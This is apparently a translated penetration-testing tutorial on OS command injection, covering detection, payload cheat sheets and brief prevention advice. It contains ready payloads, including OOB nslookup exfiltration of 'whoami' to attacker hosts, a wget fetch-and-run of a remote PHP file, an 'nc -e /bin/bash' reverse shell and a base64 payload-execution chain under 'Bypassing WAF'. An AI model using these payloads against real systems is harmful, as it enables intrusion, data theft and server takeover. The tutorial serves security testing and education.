The Penetration Tester's Guide to Command Injection
What is command injection?
Command injection is an attack whose goal is to execute arbitrary commands on the host operating system through a vulnerable application. These types of attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to the system shell. In such an attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Often, they are possible due to insufficient input validation.
This attack is different from code injection because code injection allows the attacker to add their own code which is then executed by the application. In command injection, the attacker extends the default functionality of the application to execute system commands without injecting code.
What are the effects of command injection?
This vulnerability allows an attacker to run operating system commands with the privileges of the vulnerable application. Depending on the privileges of the current user, this vulnerability could lead to access to the system, disclosure of critical sensitive data, and could lead to complete control takeover of the server or system.
How to detect and exploit them?
Assume that you are testing the parameters of the following URL during a penetration test:
https://vulnerable-website.com/endpoint?parameter=123
To detect if the source code is not protected against command injection, we can try several methods:
Insert special characters to detect delimiters:
We can inject some special characters to see if the application blocks anything that could be used for command injection:
&
;
换行符 (0x0a or \n)
&&
|
||
If the application does not throw any error messages, we can try to inject our command after using one of these delimiters.
https://vulnerable-website.com/endpoint?parameter=1|whoami
Detecting blind operating system command injection
Time delay
Most operating system command injections are blind, which does not provide any output for the executed command. To verify the vulnerability, we can use a time delay to verify the command injection after detecting the allowed special characters, as shown below:
https://vulnerable-website.com/endpoint?parameter=x||ping+-c+10+127.0.0.1||
Redirecting Output
We can also redirect the output of the command in an output file and then retrieve that file on the browser. A payload similar to the following can be used:
https://vulnerable-website.com/endpoint?parameter=||whoami>/var/www/images/output.txt||
OOB (Out Of Band) Usage
We can also trigger OOB network interactions with external servers such as Burp Collaborator. We can use a payload similar to the following:
https://vulnerable-website.com/endpoint?parameter=x||nslookup+burp.collaborator.address||
Alternatively, we can use a payload similar to the following to leak the output of the command:
https://vulnerable-website.com/endpoint?parameter=||nslookup+`whoami`.burp.collaborator.address||
The most common parameters that can be considered when testing for command injection are as follows:
cmd
- exec
- command
- execute
- ping
- query
- jump
- code
- reg
- do
- func
- arg
- option
- load
- process
- step
- read
- function
- req
- feature
- exe
- module
- payload
- run
Notes
Special characters
&
;
换行符 (0x0a or \n)
&&
|
||
command \`
$(command )
Linux command:
whoami
ifconfig
ls
uname -a
Windows command:
whoami
ipconfig
dir
ver
Supported by both Unix and Windows
ls||id; ls ||id; ls|| id; ls || id
ls|id; ls |id; ls| id; ls | id
ls&&id; ls &&id; ls&& id; ls && id
ls&id; ls &id; ls& id; ls & id
ls %0A id
Time delay command
& ping -c 10 127.0.0.1 &
Redirecting Output
& whoami > /var/www/images/output.txt &
OOB (Out Of Band) Usage
& nslookup attacker-server.com &
& nslookup `whoami`.attacker-server.com &
Bypassing WAF
vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash <attacker-ip> <attacker-port>
vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload
How to prevent it?
There are many ways to prevent this vulnerability. Here are a few suggestions:
- Avoid using shell execution functions. If unavoidable, limit their use to very specific use cases.
- Perform proper input validation when passing user input into the shell to execute commands.
- Use secure APIs when accepting user input into your application.
- Escape special characters when the security API is not available.
For reprinting, please send an email to 1244347461@qq.com for approval. After obtaining the author's consent, kindly include the source as a link.
Related Articles
PHP+ajax to achieve cross-domain single sign-on
Publish Date:2025/03/16 Views:145 Category:NETWORK
-
We have previously introduced the principle of cross-domain single sign-on in "Detailed explanation of the implementation methods of three situations of SSO single sign-on" . Here we will introduce how to implement single sign-on using PHP
WeChat public account development tutorial interface configuration and identity a
Publish Date:2025/03/16 Views:125 Category:NETWORK
-
To become a developer of WeChat official account, you must first have a server that can be accessed externally. The development of WeChat official account does not limit the use of any language. Here we use PHP as the development language.
WeChat public account development tutorial to obtain access_token
Publish Date:2025/03/16 Views:65 Category:NETWORK
-
During the development of WeChat official accounts, if we want to actively push messages to the WeChat server, we must have access_token. Access_token is the only ticket for the official account. When we develop and call various WeChat inte
WeChat public account receives messages and processes ordinary messages
Publish Date:2025/03/16 Views:149 Category:NETWORK
-
There are two situations when WeChat users interact with public accounts: one is when WeChat users send ordinary messages to public accounts; the other is when some operations of WeChat users cause the WeChat server to notify the URL filled
WeChat public account receiving message event message processing
Publish Date:2025/03/16 Views:79 Category:NETWORK
-
As we know, there are two types of messages generated by the interaction between WeChat users and public accounts: one is ordinary messages, which are introduced in detail in the article "Ordinary message processing for WeChat public accoun
IE's Ajax cross-domain issue
Publish Date:2025/03/16 Views:190 Category:NETWORK
-
Ajax is widely used in web systems, but cross-domain issues are often encountered in web systems. By default, browsers prohibit Ajax cross-domain access. The IE browser has particularly strict restrictions. For browsers such as Firefox, Goo
How to redirect a website from HTTP to HTTPS
Publish Date:2025/03/16 Views:117 Category:NETWORK
-
HTTPS is a protocol for secure communication over computer networks and is widely used on the Internet. More and more website owners are migrating from HTTP to HTTPS, mainly due to the following 5 reasons: Google announced that websites usi
How to Fix the “SSL Handshake Failed” Error (5 Methods)
Publish Date:2025/03/16 Views:96 Category:NETWORK
-
Installing a Secure Sockets Layer (SSL) certificate on your WordPress site enables it to use HTTPS for a secure connection. Unfortunately, there are a lot of things that can go wrong in the process of verifying a valid SSL certificate and e
10 Ways to Fix NET::ERR_CERT_DATE_INVALID Error
Publish Date:2025/03/16 Views:136 Category:NETWORK
-
Having an SSL certificate gives people more peace of mind when using your website. When the NET::ERR_CERT_DATE_INVALID error indicates a problem with the certificate, it blocks visitors from accessing your website until the problem is fixed
